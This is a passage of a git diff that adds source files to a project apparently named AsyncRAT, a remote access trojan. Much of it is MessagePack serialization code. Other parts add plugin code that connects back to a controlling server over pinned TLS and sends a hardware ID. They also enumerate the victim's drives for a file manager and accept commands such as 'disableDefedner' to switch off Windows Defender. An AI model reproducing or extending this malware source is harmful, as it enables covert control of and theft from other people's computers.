+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
new file mode 100644
index 0000000..e2896cf
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
@@ -0,0 +1,68 @@
+using Plugin.Handler;
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Management;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Windows.Forms;
+
+namespace Plugin
+{
+ public static class Packet
+ {
+ public static void Read(object data)
+ {
+ try
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "visitURL":
+ {
+ string url = unpack_msgpack.ForcePathObject("URL").AsString;
+ if (url.StartsWith("http"))
+ {
+ Process.Start(url);
+ }
+ Connection.Disconnected();
+ break;
+ }
+
+ case "sendMessage":
+ {
+ MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
+ Connection.Disconnected();
+ break;
+ }
+
+ case "disableDefedner":
+ {
+ new HandleDisableDefender().Run();
+ Connection.Disconnected();
+ break;
+ }
+
+ }
+ }
+ catch (Exception ex)
+ {
+ Error(ex.Message);
+ }
+ }
+
+ public static void Error(string ex)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Error";
+ msgpack.ForcePathObject("Error").AsString = ex;
+ Connection.Send(msgpack.Encode2Bytes());
+ }
+ }
+
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs
new file mode 100644
index 0000000..0a440aa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs
@@ -0,0 +1,34 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient(msgPack);
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..474cca6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Extra/Extra/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("424b81be-2fac-419f-b4bc-00ccbe38491f")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager.sln b/AsyncRAT-C#/Plugin/FileManager/FileManager.sln
new file mode 100644
index 0000000..e3c9ff9
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FileManager", "FileManager\FileManager.csproj", "{BEE88186-769A-452C-9DD9-D0E0815D92BF}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {BEE88186-769A-452C-9DD9-D0E0815D92BF}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {4FD410CC-1F1D-4948-A108-13285D633CDD}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs
new file mode 100644
index 0000000..c9e93f3
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs
@@ -0,0 +1,217 @@
+using Plugin.Handler;
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient(byte[] packet)
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "fileManager";
+ msgpack.ForcePathObject("Hwid").AsString = Hwid;
+ msgpack.ForcePathObject("Command").AsString = "setClient";
+ Send(msgpack.Encode2Bytes());
+ new FileManager(new MsgPack()).GetDrivers();
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ GC.Collect();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj b/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj
new file mode 100644
index 0000000..63ff41f
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj
